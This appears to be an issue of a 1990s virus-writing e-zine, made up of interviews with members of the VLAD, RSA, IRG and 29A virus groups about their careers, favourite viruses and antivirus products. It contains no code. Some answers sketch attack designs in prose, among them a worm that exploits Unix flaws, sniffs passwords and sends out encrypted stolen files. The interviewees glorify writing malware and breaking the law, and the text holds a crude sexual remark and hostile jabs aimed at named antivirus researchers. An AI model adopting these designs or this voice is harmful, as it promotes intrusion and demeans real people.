Quotation & Poetry
Just read my mind and find the complete guide to insanity. Should be trivial if you belong to the secondfoundation. Personally I dunno about what choice I would made. First, Second or Gaia.. Hm, tricky.
But.. who really want to make choices. That sucks. I just want it all :).
Future
I will continue hanging on the irc, writing my stupid articles and just float around being what I've been.Really, I'm so satisfied what Sepultura has done for IRG so consider him in control. If you found thisarticle chaotic. You're right that was the idea if I might add that. For IRG, the future is as bright asalways.
Download attached files here
Happy Valentine and 1997.
The Unforgiven.
Interview with CoKe of VLAD
People, this interwiew is the only online interview in this issue. In all othercasesi send to the ppl questions and just waited for the reply. If this interviewsoundsrather strange, nevermind, apologize it, I interviewed _CoKe_ in veryunhealthytime. If I remember, it was about 6.30 am when we started. And in such atime,every normal european programmer sleeps... For some 1 or two hours...
Coke, try to introduce yourselves ....Hehe.. Well My handle is CoKe, comes from Coca Cola, not fromcocaine.. :) It's my first and only handle. Good enough ? :)
So, the next question, really difficult one: When did you start to dosomethin' with computerz?Phew.. I was 10 or so when I got my first PC.. 8088 XT with Herculesgraphics card... Since most of the games were CGA only I started to codein BasicA and GwBasic to write my own games... :) That makes 13 yearsnow
The coder was born.... but, in my humble opinion, the gamez and virii 'rekinda different,or am I not right?Of course. But I wrote my first "virus" in QuickBasic 4.0 some yearslater... On execution it got the current EXE name from commandline, did ashell "dir >file.txt", opened that, and overwrote the EXE's in currentdirectory with a copy of itself..heh
Soundz like good start, but to go resident in HLL is right difficult task. Soyou have to switch to the right language - to the assembler...Yeah.. I was too limited in Basic, so after a while, I switched to C... And tomake some small routines faster, I used a bit of assembler to speedthings up...
So your destiny was about become assebler xpert and viruz coderz afterall the switching ....Yeah... I always found viruses quite fascinating.. Biological AND computerviruses.. So I grabbed some interrupt list (Not Ralphies), TASM, andstarted writing a non-ow com infector.. That actually took me 2 weeks ofnon-stop (night)work.. Another week later, I wrote a re mover for it, since
my friends playing and copying everything from my system got allinfected.. hehe
I know that situation. Non-ow com infectorz are good start for a coder, butyou didn't stop at this level of code i know... And that nice story withremover ... Didn't you think of launching some kind of AV biz ?My first EXE infector was months later.. I first had to get Internet.. There Ifound an IR mag, called up their HQ, and got in touch with TheUnforgiven and Metal Militia.. So I got more and more info, and got intowork for my first EXE infector.. :) At that time I sent all my sources toMetal Militia, to discuss them over.. He was an idol at that time.. I thoughtabout becoming AV for a time, but quickly realized that the AV was acommercial thingy, and directed by a few ppl. So I dropped the ideaagain... Especially after I got in touch with qark
Qark is (was?) really very productive coder, and of course, VLADmember. And to code alone, without beeing in any group is not such a bigfun....Exactly.. >From the IR HQ I polled NukeNet, and posted some mailsthere... One day I had an email from qark inviting me to visit #virus, whichI did.. He immediately put me on the Bot (LamerBot)... I coded somemore stuff, and I gave one of them to VLAD because I wanted to join..The votes were in my favour... fortunately.. :) hehe.. The funny thing isthat the virus I gave them was buggy... But that's an old VLAD tradition..hehe
[...I always use to say "It is not actually bug, but only some minorcompactibility problem with hardware... :)"...]
So you landed in VLAD. How was the feeling of beeing member of suchelite bunch of geekzI was VERY surprised... Because I became a VLAD member some weeksafter I applied for IR membership.. I got refused because I was non-Swede (No kiddin').. That depressed me alot.. :) Becoming a VLADmember was something I didn't even dare to dream about.. :) I rememberthe day when votes were finished, and Metabolis said on #virus : "CoKe isnow a VLAD member"... Guess that was one of my happiest days.. :)
And can you say, why is the true reason of vlad's dead ?First of all VLAD is _NOT_ dead...
??? all the people 're saying "VLAD is dead and issue #7 was goodbyeissue...That's not correct. There will be a VLAD #8... 100%...
That means ....???Well it means there will be a VLAD #8... :)
.
And who is continuing in the tradition ?Darkman, me and [XXX] heheh... Qark and Quantum left VLAD becausethey were in the biz for too long I guess... hey both did a remarkablework, so I guess they earned that pause. :-)
Let's back to the main topic, the viruses. What's your best virus, what'syour most favourite virus ... And what virus ,in your opinion, wassomewhat innovative in the last time ?I like all my viruses, and have absolutely no favourites.. Each virus is amirror of my knowledge at that time, so I like them all.. I think my mostinnovative is Obscurum which is a COM/EXE stealth/res/poly that has gotsome neat tricks to hide..
And some really good viruses by other authorz ?I think the most impressive virus of all time is BIZATCH, not because itwas done by a fellow VLAD member.. Bizatch kicked Bill's ass.. :)
I agree, but all the AV humbug about naming it Boza was reallydisgusting.Yes. I still don't quite understand why that shit.. Probabaly some kindarevenge.. A really LOW level revenge..
BIZATCH has shown, that W95 is piece of shit, but actually, we all knew itfor a long time. So now i wolud like to ask you about your planz for thefuture. As coder and of cos also in general... new OSes, new viruses, newtrendz ...Yes.. I loved OS/2, but due to a lack of software, I almost HAD to switchto WIN95, just like thousands of other users... I hate Bill for that.. OS/2was much better, and WIN95 only made it because of a HUGE publicitywork by Mickeysoft.. My future.. Oh my... I'll do more viruses, and we'll tryto get VLAD up again.. :)
Microsoft, how can be something good, if it is produced by someone withsmall and not hard (e.g dick :)... btw, we have here such a club - M$-haterz and ALT-F4 clubI like that ALT-F4 club.. hehe where can I join ? :)
Would you like to contribute to greetingz section and to fuck you section ?Greetings to Qark, Metabolis, MMIR, TUIR, Blonde/IR and Skeeve. Fuckthem go to : All the lame irc-warriors.. Oh yeah .. and greetings toSokrates aswell.. :)
Okay , wish you good luck and good in yuor work.Thanks.. :) And don't forget.. VLAD is not dead... :) I'd be grateful if youcould email your mag to me..
That was Coke exclusively for *zine, thanx for interview... and remember...
VLAD is still ALIVE!
Interview with Wild W0rker of RSA
Wild W0rker is one of the regulars on #virus. So I decided to ask him for aninterview. Here I present the resulting textfile.
Can you introduce yourselves ?I am Wild W0rker, Ukrainian virus writer and RSA member born in the1937 :). I have girlfriend (but may be she is my wife already, coz i don'tknow when this mag will be released :).Wildie is married man for some 2 or 3 week now :). Here you can see howlazy I am ...
What is RSA?Ruthles Stealth Angels (RSA) that's Ukrainian virus writing group. BTWwe need good coders:), if you are good coder and wanna be RSAmember, email me to [email protected] or [email protected])
Why did you choose nick Wild W0rker?Dunno:) I was drunk when i select it:)
When and why did you start to be interestin' in computers ?I've seen the first time the computer 6 years ago at the school. It was thesoviet computer and looked as a refrigerator:). I love refrigerators withproducts, that's why i love computers:) ( joke :)
[ I know such a computerz :) ]
Your first contact with virus ...When i start work with computers, one virus formated all my disks...That's was my first contact with viruses:)
[ Hi boyz, who coded that Anti WW0 virus ? :) ]
What about your first virus ?Heh, i made it one year, it was resident com infector. It was shitty virusyou know what is first virus:) and i rm it.
Virus as weapon ( bunch of paranoid geeks like NSA,CIA,DIA,SIS 'reasked to skip this question and answer)Well if you have problems with some ppls you don't need to use gun...You can infect their computers and destroy all information on it... may be
.
after that this ppls will use gun for suicide:)
Your favourite virus and whyHmm i think Zhengxi is it, coz it can infect everything, have goodpolymorphic engine and many other nice features:)
Your favourite antivirus program and whyAVP, coz it have good polymorphism detection, not bad speed, xcellentvirus descriptions. (and it can be fucked...look at 29A#1:)
Vx coder you would like to meet personally and whyI like to meet with all vx coders who can drink not only juice:)
AV people you would like to meeti don't want to meet with AV ppls.
AV name(s) making you to puke :-Pno one:)
Are in your country some laws against viruses and their authors?May be that's funny, but i don't know:)
What do you think 'bout maniacs who want to bust and prosecute us, thevx coders and would like to erase the vx scene ?they are idiots:)
Your plans 4 the future as coder and in general...Well me and my friends (RSA members) will work on dos/win95 virusesand we trying to make undetectable virus...
Last but not least : can you point us to some interestin' online resourceson the internet ?www.ilf.net - that's nice vx archive
[ unfortunately, shortly after the zine was released, server of theInformation Liberation Front went down and never reappeared. Anothermysterious case of dissapearing server ... ]
So Wild W0rker, thanx for interwiew. And keep writing viruses . And don't worry 'bout being married :-P
Interview with Sepultura of IRG
So, in the line of this policy, I decided to interview one of the IRG leadingpersonalities, Sepultura. Althought I had some technical problems in the time[ Sep knows :) ], here is the interview. Enjoy it !
Can you introduce yourselves ?Im Sepultura, born 1979, from Australia. Im a virus writer who is amember of IRG (Immortal Riot/Genesis) and do a lot of the organisationthat go's into IRG's magazine Insane Reality. The only thing I like morethen viruses is music (Sonic Youth, Front 242, Sepultura, and Beethovenare among my favourites). Actually I like copious amounts of buds and lsdmore then viruses too.
When and why did you start to be interestin' in computers ?I was never interesting ;) (so stop reading this interview).
When I was 6 my mum bought us a Commodore64. I learnt BASIC and bytime I was 7 I was very proud of this 'guess the number' game I made. Ispent a few years playing with the C64, but as you can imagine I got quitebored with it soon. Then, when I was 12, some teacher let me muckaround on the school's computers while the rest of my class was doingmaths (since me and a friend already knew it.. infact all of IRG have IQ'sover 200). Me and my friend made this game to test peoplesmultiplication tables and stuff, but the school never used it, as it flashedrandom insults and was quite abusive to the user if you got the answerwrong. This re-kindled my interest in computers and I nagged my motherwho bought a 386dx in that same year. (This was the computer on whichmy virus writing started).
Your first contact with virus ...For some reason I cant explain, I became very interested in viruses (aged13, 1992). I didnt have a modem and knew no coders, so I had no ideawhat I should do. I met some lame fuck who told me viruses were writtenin C.. so I learnt C and after learning C still had no idea what to do (I didnteven know what a virus really does.. I just knew it replicates). Then I gotvsum and it seemed to describe what viruses did in some detail but I hadno idea what it meant (what the fuck is Interrupt 13h?? =)). Then I got F-Prot and somewhere in its documentation Fridrik Skulason mentioned anyaverage Assembler coder could make a virus.. now I knew I shouldn'thave learned C. Finally I gota book (this is late 1993) called'Undocumented DOS' that told me about thing like Interrupts, segments,file I/O, and MCB's. It also had example programs written in ASM. I learnt
ASM by studying these programs and by playing around in DOS debug.
At this stage I was ready to write a virus. Beetween here and when I hadfirst become interested in virus's I had never actually seen or had contactwith a virus.
What about your first virus ?Well.. just after learning ASM (or DEBUG ASM more precisely) my friendgot his machine infected with a virus called Slow (an encrypted 1721 byteJerusal variant). I didnt have an assembler or disassembler (I didnt evenknow you could get disassemblers) so I studied the virus in Debug. Idecided it was very badly coded, and wanted to make some changes, butI didn't even know how to change the length of the virus (so I had tomodify it *and* keep it at 1721 bytes). The result was a semi-polymorphicvirus with text strings and an actiation routine. That *could* be my firstvirus but it was only a hack.
I didnt write a virus for a while because I didn't have an assembler, butfinally I decided to write it in Debug. This involved writing the entire virusin Debugs (A)ssemble mode, printing out the (D)isasm listing, looking forerrors, re-doing it over and over again until it worked. The first virus I didwas Sepultura Boot.A which I spent an entire evening working in Debugon. Then some TSR .COM infector (I worked out how to go TSR byreading the doc's of an AV program called Stealth Bomber). Then myfriend got a modem and I begged him to find me an assembler, which hedid, and then I was free to write viruses as much as I wanted.
You started as an independent coder, but after your massive support forInsane Reality #7 you landed in Immortal Riot. Tell us the whole storyOK.. here comes more of my life story =)
Mid '95 I got a modem and a carded OzEmail account. This is when I wasfirst introduced to the virus scene. I met some guy called Qark, fromVLAD magazine (which I read after FTP'n it with my schools inet accountwhich I 'socially engineered' the password too). He was a nice guy andwhen I told him I was a virus coder he asked to see some code, which Ishowed him and he ended up sticking in VLAD#5. This is when I realisedother people might actually care to see my code. So I coded more andgave it to The Unforgiven (TU from now on) for IR#7. It turns out I donatedmore then average and people were impressed. Late in December '95 Ijoined VLAD but this didnt last long. There was a new group calledGenesis, but after leaving VLAD I didnt think I should ask for membershipin it as it would look like I was group hopping. Februrary/March 1996, andTU told me IR was now an open group and I could join, so I asked if Icould, and I did. Then (perhaps cos I nag too much) TU let me do a lot oforganisation, and I ended up organising IR#8. And thats the whole story.
Perspectives of polymorphismTraditional polymorphism (with a static virus wrapped in a highly variabledecryptor) is a dying concept in my opinion. With the advent of generic
decryption, polymorphism is not really much of a threat to the scannersany more.
I think the future lies in the 'metamorphic' viruses. These are viruses thatare not encrypted, but the code of the virus itself changes. These includeviruses such as PLY, Win.Apparition, TMC, and Swap. If we imaginemetamorphism in the future reaching a stage where the only thing twocopies of the 'same' virus have in common is the algorithm (or whatactually they do). This can pose some interesting problems. Lots of'different' viruses use exaclty the same algorithm, so if a virus thatmodifies its code comes out is it just creating a new copy of the samevirus, or a new virus? And really, detecting a virus just by looking for codeto perform a certain algorithm, is what is used for heuristic scanningtoday, so when detecting a truly metamorphic virus, you are likely todetect a lot of completely unrelated viruses - how can you identify such avirus?
[ TMC hex dump can be found in this issue of our zine :P The source 'llbe released only after all the major AV vendors 'll detect it. IMHO, theyshould have their job as hard as possible for their money :))))) Ed. ]
Perspectives of stealthStealth is a problem. Stealth stops the user noticing the virus, but to dostealth, you must be able to identify the virus and find the nescessary infoin the virus body. This defeats the purpose of polymorphism. I think in thelong run, good polymorphism is a better option. I don't like viruses that areto desperate to be 'stealthy' that they sacrafice compatibility, like DIR-2,Assasin, and No. of the Beast.
Virus as weapon ( bunch of paranoid geeks like NSA,CIA,DIA,SIS 'reasked to skip this question and answer)The kind of viruses we deal with (80x86) are not much of a weapon in myopinion. But I think viruses could be used as a weapon. Imagine amultiplatform virus (perhaps a Unix Shell Scipt), that exploited many Unix(and Unix variants) security flaws, and spread over a TCP/IP network.This is very similar to what the Robert Morris internet worm did, but itwould have to be updated for newer systems, and shouldnt replicate tillthe machine crashes. The virus could then perhaps act as a sniffer,monitoring Ethernet activity looking for logins/passwords to other systems,to continue its spread. Further more, the virus could even search through(for example) any file, looking for the phrase 'U.S. Intelligence', and if thephrase was found, compress the file and send it to some barely usedpublic-FTP site or mail the file UUENCODED to some obscure USENETNewsgroup, for the creator of the virus to download. Lastly, the viruscould use a public key encryption system (such as RSA) - the virus wouldcontain the public key, and encrypt the stolen (and compressedinformation with it, so that it could only be decrypted by the creator of thevirus, and people would not realise these junk files on the FTP site orUSENET group contain anything unusual. If this was done well, it could bequite an effective intelligence weapon. (And we at IRG have done it, thats
.
why we know everything about everyone).
As an Australian dude, can you describe local virus scene ?The Australian virus scene is quite healthy. Lots of solo virus writers havecome from Australia, such as the Gingerbread Man, aswell as quite a fewmembers of NuKE, IRG, VLAD, and the AIH. As far as the internationalvirusscene go's, I think Australia is quite prominent in it (Slovakia,Taiwain, ex-USSR, and Australia have all extended 'virus technology'quite a bit). On a more local level, the virus scene in my state isreasonably healthy too. Two IRG members live in this state, aswell as afew lesser know virus coders. There are also 5 BBS's that I know of in thisstate that carry Virus related file and/or mail areas.
The same stuff as previous but AVAs far as I know, Leprechaun Virus Buster, and Cybecs VET are the onlytwo Australian AV programs. They both suck completely and are not evenworth mentioning.
Your favourite virus and whyI dont have a single favourite virus. My favourite viruses include:
Tremor, Havoc, N8FALL: Neurobasher was cool, if you consider the timeat which his virus were written. It is almost like he made a list of all threatsto viruses at the time, and then made viruses to adress these threats, 1by 1. For example, the heuristic scanners (which were just coming outwhen he was around) detected suspicious date stamps, so he startedusing size padding instead, and modified his entire set of full-stealthroutines to accomodat the variable size. In my opinion he is the king ofretro-viruses - his were really the first ones to make strategic attacks onthe AV programs.
Level3, Onehalf: Vyvojars viruses caused many problems for the AVaswell. Lots of scanners still cant detect these two viruses reliably. TBAVis even stupid enough to claim you should clean Onehalf with FDISK/MBR ;). Level3's engine is very complex yet is very logically coded.
Natas: Priests code is very clean and error free, which is sadly, somethingmost viruses writers (including my self) lack.
Phoenix, Commander Bomber, MtE: DAV's code is fucking crazy. Hardlyanyone I know can even understand the structures used in his viruses(especially MtE and Bomber). He's also the 'number theory in viruses'king.
TPVO: The TPVO viruses are excellent, strategic, and very cleanlycoded. So are Dark Slayer's engines. Dark Slayer is one of the bestcurrently active virus coders in my opinion.
Level3 and DAME are both worth looking at just for their very sturdy andlogical code.
[ Well, as for One_Half, check out its original source code in the mag.First time ever published stuff :-P Ed. ]
Your favourite antivirus programm and whyAVP would probably be the best over all program (it has excellent knownvirus detection and cure, CRC checking, good heuristics, and gooddecryption).
F-Prot has good known virus detection/cure.
Dr Web and DS-AVTK have very good emmulators. I do not know whatmethods ICE-NOD uses, but it is very good too.
Suspicious.. I barely consider this an anti-virus program, its much morelike a set of diagnostic tools. Apart from the fact that it doesnt have thebest decryption, the reports its heuristic scanner SSC gives are verydetailed. Often, when I recieve a new virus sample, instead of analysing itmanually, I just run SSC over and read the result.
I use AVP, AVG, DS-AVTK, ICE-NOD, F-PROT, TBSCAN, DR WEB, andSUSPICIOUS to test my viruses.
Vx coder you would like to meet personally and whyJust because someone is a good coder, I would not want to meet them -having a technical discussion with them over the phone/IRC/mail isenough. I have met DV8 before (the guy who coded Mr Klunky) and hegave me beer, so I guess I wouldnt mind meeting him again. I also wouldlike to meet any other virus writer that would give me beer. I'd like to meetbasically all of IRG.
AV people you would like to meetStefan Kurtzhals, the coder of F/WIN and Suspicious is an excellentcoder and has a lot of technical knowledge, but from the discussions Ihave had with him I think he's fucking crazy, so I wouldnt mind meetinghim. Also, any AV person who will give me beer. MikkoHyponnen/Eugene Kaspersky and occasionally Alan Solomon seem tomake amusing jokes (and like beer).
Sara Gordon/Vesselin Bontchev/Jim Bates, so I can spit in their eye (andsteel their beer ofcourse).
[ Sep loves beer :) , i can promise if I 'll ever meet him, he gets some beerfrom me ... But basically, he should fly to Europe .... As 4 Jim Bates ... Hedeserves much more than such a lenient treatment. We should try to useMagic Bullet (tm) ... Ed. ]
Are there in Oz some laws against viruses and their author?There are no laws against writing viruses as far as I know. Spreading
them is a different story. Laws were made to be broken anyway.
What do you think 'bout maniacs who want to bust and prosecute us, thevx coders and would like to erase the vx scene ?I dont think about them. They don't matter, and they will never succeed.We can simply ignore them, and they will go away. (But others will comealong to take their place, so we just keep ignoring the ignorant massess).
Your plans 4 the future as coder and in generalNo idea. I'm currently looking at infection of the new executables(NE/LE/PE and LX) aswell as metamorphic viruses. Besides viruses I likeplaying with cryptography and computer security in general.
Last but not least : can you point us to some interestin' online resourceson the internet ?http://www.geocities.com/SiliconValley/Park/9595/ (IRG homepage)http://www.ikx.org/ (Lots of Stuff)http://www.cyberstation.net/~cicatrix (Lots of Stuff)http://www.metro.ch/avpve (Virus Encyclopoedia)http://www.virusbtn.com/ (Virus Bulletin)ftp://ftp.informatik.uni-hamburg.de/pub (AV papers)ftp://ftp.elf.stuba.sk/pub/pc (LOTS of AV Programs)
So thanks, Sep. Was very nice you spended some time with thisinterview.Not a problem, good luck with *-Zine. (Was I supposed to answer that??)
[ Sure, what else ? :) Ed. ]
Interview with MrSandman of 29A
... known as Tarantino's film lover.As i wanted to gain some interviews for this issue i started with Sep. But duesome problem with my mailer daemon, actually the first interview was thisone. Lem'me introduce dude from Spain, who stayed some time in Romania.I guess, that the Romania episode was the reason why Mr. Sandman startedto write viruses. Just for explanation. Romania borders on Bulgaria.... AndBulgaria.....
Can you introduce yourselves ?Well, we're just a group of friends who knew themselves in a BBS, startedchanging ideas and decided (me) to found a virus writing group andrelease a virus magazine. Most of us are studying a career at theuniversity, other are in the military service, and the rest are studying at theschool, very near to start a career.
Your relationship to girl, beer and another lovely subjectsHehe... well, my relationship with my girlfriend is ok, we even travelled toIndia and live (sometimes) together in a flat of mine... we've been goingout for more than a year :)About beer, i'm sorry, but i don't like it :) I don't like drinking, i only do it invery special circumstances. Other lovely subjects could be music, cinema,and, of course, computing and writing viruses. Anyway, i don't have manyfree time, as i have a lot of exams and a lot of unreplied BBS and Internetmail... i guess you know this situation :)
When and why did you start to be interested in computers ?I had my first experience with a 8088 bought by my brother, when i wasonly 6 or 7. I didn't have any adaption process or shit like that, i just likedcomputers since the first time i knew them. Anyway, i must say that myfirst love was my first Macintosh :)
Your first contact with virus ...It was some time after buying my first Mac, with a virus called WDEF withwhich there were some infected applications my brother brought from hiswork. Anyway, it was also an AV contact, as i did a disinfection work withan application called ResEdit (the equivalent in Mac OS for the debug.exeof DOS) :)
Two years later, more or less, my PC got infected with theTraceback.3066 virus, and that's when i really got interested on viruses,albeit i could not do any 'serious' work until i got a modem and
downloaded more virus stuff (especially virus magazines) from spanishunderground boards.
What about your first virus ?Heh... well, there were some projects. The first virus i coded was a 30-byte-more-or-less overwriting infector :) Later i wrote an appending non-resident COM infector, later i tried the EXE infection, SYS files, etc. Andthat's when i started combinating different kinds of infections and inventingsome new original stuff.The boot/MBR thing came later, but that's something i never liked, dunnowhy... this is... i can write a boot/MBR infector in two minutes, but i don'tlike them at all; don't ask me the reason :)
How did u land in 29A staff ?Well, actually i never landed... it was the rest of the people who did it :)We all used to interchange ideas and material via a spanish BBS calledDark Node; one day i realised that we had enough stuff to release a zine,and then i proposed it. Many people accepted, so we founded 29A and westarted to work in order to release our first zine asap.
Anyway, in 29A there's no staff, there's just a boss who takes decissionsaccording to the opinion of the rest of the members, but there are no'range' differences between us.
Perspectives of polymorphismPolymorphism has some advantadges if we compare it with other viraltechniques such as stealth, for instance. There's no any unique routinewhich mutates viruses, it's something very personal, more personal eventhan a virus itself. So it depends on the imagination of a virus author towrite a powerful-supercomplex poly engine... anyway, right now we mustfocus the slow poly stuff, as it's the unique way to fuck AVers and makethem worth of the money they earn.
And this last thing depends on the point of view of each virus author;some of us bet for originality, other writers prefer to release their virusesand see how long do they stay in the wild... so there's no any uniqueanswer.
Perspectives of stealthStealth is almost dead, it's the opposite thing to polymorphism. There arevery few stealth techniques, as everybody uses the ones which alreadyexist... they only vary a little if you mean full stealth, as it's somethingwhich takes a bit more of time.
They work, so everybody uses them; they're very simple, so it's verydifficult to write something really original and special on them. Anyway,Super (new 29A member!) has something to say about this ;)
New systems (W95, NT OS/2 ) and viruses ...
Since Bill Gates is the wealthiest man in the earth right now, we mustassume that Windows (and i don't mean Windows95 or NT) is the future.Heh, anybody could make all the people think that a crock of shit is good,and even eat it... if he has the money Bill Gates has :)
Operating systems such as Linux, OS/2 and Mac OS are very good, butthey will die soon as the number of dickheads increases every day. Ofcourse, Windows95 won't be the definitive operating system... anyway, ithink that it's a positive thing to spend our time trying to find out more stuffabout PE infection under Windows95, as things won't change radically in aLOT of time.
Today I got a message about first virus under Linux. What do you thinkabout itGood news for the virus community, of course :) That's the second part ofthe future... 50% will be Windows-dickheaded users, and 50% will beInternet applications developers who will work under Linux/Unix withprogramming languages such as Java.
Anyway, Linux is still a very 'rough' operating system which evolves withvery slow but firm steps into a definitive consistent alternative.
Virus as weapon ( bunch of paranoid geeks like NSA,CIA,DIA,SIS 'reasked to skip this question and answer)It'd be very difficult to write such a virus (if you're expecting a goodsuccess ratio), cause it'd have to be a slow infector... but not so slow,cause it'd then leave more time for people to discover it. It'd a good ideato copy itself into unusual places, either using the cavity infection methodor the Pascal/C trick used by Zhengxi and Lucretia.
There would be much more doubts about this, such as, for instance,wether to be small (the virus) but with a stupid encryption, or to be around10k long, but encrypted with five highly polymorphic complex engines.
As an Spanish dude, can you describe local virus scene ?There's no scene besides 29A in Spain... there are many undergroundboards, but almost all of them without any special relevance. The twomost important underground BBSs in Spain are Dark Node and Edison'sTemple. In both of them you can find a lot of virus writers, but most ofthem are members of 29A, or just write a common virus from time to time.
It seems that hacking/phreacking is more popular here. In fact, Edison'sTemple is a hacking-oriented BBS, just ask Mr. White or Wintermute, twoof the most important persons there.
The same stuff as previous but AVSome time ago there was an antivirus called Skudo, written by a doodfrom Barcelona called Jordi M=A0s. Anyway, it was designed forpreventing against viruses, not for detecting/disinfecting them. As its
.
author left Barcelona and now lives in France, we didn't know anythingelse about Skudo.
There are some other 'pure' AV packages, such as Artemis, Panda,Oyster, XScan, PC-Cillin, and so on, but they're just commercial shit (thetypical ignorant dickheads who claim that their antivirus detects over 9000viruses , you know...).
Your favourite virus and whyErrrhmm... never had anything clear on this. I think i'd choose Zhengxi asmy favourite virus, as it's the most complex i've ever seen in my life, andthere are still lots of unexplored (commented tho) things on it which can beused in other viruses.
It's original, it uses a very insidious infection way, it's the most difficultvirus to detect/disassemble, and its poly engine is *awesome*.
Your favourite antivirus programm and whyAVP, of course. It's the most professional (well, i'd even say it's the uniqueprofessional AV), very reliable, easy to use for lamers and very flexible forgurus, it's the one which detects/disinfects more viruses, and the uniqueAV which includes so necessary (and easy!) techniques such asdisinfecting known viruses in memory. Its code analyzer is the best, andit's probably the most difficult AV to fool. Besides, i love AVPUtil andAVPRO, two utilities of its registered version :)
Vx coder you would like to meet personally and whyDunno, this is probably the most difficult question. I think Qark, he's veryfunny, he's the virus writer i admire most, and i have a very goodrelationship with him; of course, i'd like to meet other people i admire a lot,such as Quantum, Stormbringer, Rajaat, Q the Misanthrope... who knows,there are a lot.
All the 29Aers usually meet in Spain two or three times a year, and we avea lot of fun, we even bring computers to our meetings, so we canexecute/write viruses, and so on :) Of course, it would be very nice to doan european VX meeting, that would be da freak! ;)
AV people you would like to meetI'd like to meet Kaspersky in order to discuss technical stuff... in other todo other things, i'd rather choose Patty Hoffman, for masturbating in hertits, Vesselin Bontchev, in order to suggest him a new haircut, and FransVeldman, for waking him up.
Are there in Spain some laws against viruses and their author?There's just a law which forbids to modify/destruct any data, but there'snothing against writing self-reproducting code and/or releasing it, you'reguilty only if you're the one who executes it intentionally.
What do you think 'bout maniacs who want to bust and prosecute us, thevx coders and would like to erase the vx scene ?I call that envy. They can't just understand that the word 'virus' doesn'timply 'destruction' necessarily, so they can't understand that many peopleenjoy themselves writing viruses, just as other people do when they paintpictures or watch TV. They'd probably like to know how to write viruseswithout having to use VCL, but their morality forbids them to have anykind of relationship or contact with people in the virus scene.
Your plans 4 the future as coder and in generalJust to release a lot of highly succesful 29A issues and to have more timeto spend on doing the thing i like most: writing viruses. Never mind if theywork under DOS, Windows, Windows95 or GameBoy, it's just to feelagain the sensation of having written something really original andinteresting to the rest of the people.
Last but not least : can you point us to some interestin' online resourceson the internet ?Well, i'm not very used to navigate through the Internet, but anyway i havesome interesting addresses in my bookmark...
http://www.wcivr.comWCIVR (Falcon's and Poltergeist's, the largest virus collection on the web)
http://www.comp-craiova.ro/~mkm/virii.htmlGreenline's homepage, full of pretty interesting links
http://www.cyberstation.net/~cicatrixCicatrix's homepage (check it out!)
http://www.onetinc.com/~roadkillRoadkill's Caf=82 (by Jack the Ripper).
http://www.ilf.net/god@rky/virii.htmGod@rky's virus heaven (probably the most complete)
http://www.arrakis.es/~sandman
Btw, pay attention at the major changes and surprises which are gonnatake place at the 29A's official website. ;)
So thanks, Mr.Sandman. Was very nice you spending some time with thisinterview.It was nice to answer all your questions, best luck with your magazine! :)
Thanx a lot, dude...
![KP EZine 104 September 2015[1]](https://img.pdfslide.us/doc/110x75/563db914550346aa9a99cdd9/kp-ezine-104-september-20151.jpg)
